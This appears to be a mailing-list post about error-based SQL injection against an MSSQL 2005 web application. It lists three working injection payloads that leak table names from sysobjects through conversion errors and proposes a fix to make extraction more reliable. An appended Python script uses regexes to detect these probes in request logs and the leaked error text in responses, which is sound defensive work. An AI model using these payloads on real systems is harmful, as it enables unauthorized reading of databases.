Hey,

I'm using the error-based technique for extracting data from an MSSQL server
(2005 - 9.00.4053.00). It seems like concatenating the sub-query with a string
doesn't work well - for some reason, the webserver returns the regular
response for row not found instead of throwing an error.

I tested it manually and found the following:

   - ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U')) -- - Works well - throws an error with a table name ("Conversion failed when converting the nvarchar value 'TABLE-NAME' to data type int.")
   - ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE xtype = 'U')) -- - Works well - throws an error with a table name ("Conversion failed when converting the nvarchar value 'x:TABLE-NAME' to data type int.")
   - ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE xtype = 'U')) -- - Doesn't work - just returns 'page not found' (not a 404 error, an error from the script telling that no rows were found)

Can anyone test and confirm this? I'm not quite sure why that happens, but
it seems like it can easily be fixed by adding the strings inside the
sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does
now.

Thanks
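For anyone monitoring an application against the probes quoted in this post, here is an added example (not code from the post or from sqlmap) that flags the CONVERT(INT,(SELECT ... FROM sysobjects)) request pattern in URL-encoded request lines and spots the verbatim "Conversion failed when converting the nvarchar value" text in response bodies, which is the disclosure the technique relies on. The log lines and response bodies are constructed samples; matching sys.* views as well as sysobjects is my own generalization.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (URL-encoded query strings, as a web server would log them).
SAMPLE_LOGS = [
    "GET /item.asp?id=1 HTTP/1.1",
    "GET /item.asp?id=1%27%29+AND+3792%3DCONVERT%28INT%2C%28SELECT+TOP+1+name"
    "+FROM+sysobjects+WHERE+xtype+%3D+%27U%27%29%29+--+ HTTP/1.1",
    "GET /item.asp?id=1%27%29+AND+3792%3DCONVERT%28INT%2C%27x%3A%27%2B%28SELECT+TOP+1+name"
    "+FROM+sysobjects+WHERE+xtype+%3D+%27U%27%29%29+--+ HTTP/1.1",
    "GET /search.asp?q=convert+a+file HTTP/1.1",
]

# Constructed sample response bodies: the first leaks the MSSQL conversion error verbatim.
SAMPLE_RESPONSES = [
    "<p>Conversion failed when converting the nvarchar value 'x:Users' to data type int.</p>",
    "<p>No rows were found.</p>",
]

# Request side: CONVERT(INT, <anything> (SELECT ... FROM sysobjects | sys.<view>)
# (sys.<view> is an assumed extension beyond the post's sysobjects queries).
ERROR_BASED_REQ = re.compile(
    r"convert\s*\(\s*int\s*,.*?\(\s*select\b.*?\bfrom\s+(?:sysobjects|sys\.\w+)",
    re.I | re.S,
)
# Response side: the exact error text quoted in the post, capturing the leaked value.
ERROR_BASED_RESP = re.compile(
    r"Conversion failed when converting the nvarchar value '([^']*)' to data type int", re.I
)


def decode_request(line):
    """URL-decode a request line so encoded payloads can be matched."""
    return unquote_plus(line)


def flag_requests(lines):
    """Return indices of request lines carrying a CONVERT(INT,(SELECT ...)) probe."""
    return [i for i, line in enumerate(lines) if ERROR_BASED_REQ.search(decode_request(line))]


def leaked_values(bodies):
    """Return the values disclosed through the conversion error in response bodies."""
    return [m.group(1) for b in bodies for m in [ERROR_BASED_RESP.search(b)] if m]


if __name__ == "__main__":
    print("suspicious requests:", flag_requests(SAMPLE_LOGS))
    print("values leaked in responses:", leaked_values(SAMPLE_RESPONSES))
```

Any non-empty result from leaked_values means the application is echoing raw database errors to the client, which is the condition that makes this extraction method work in the first place.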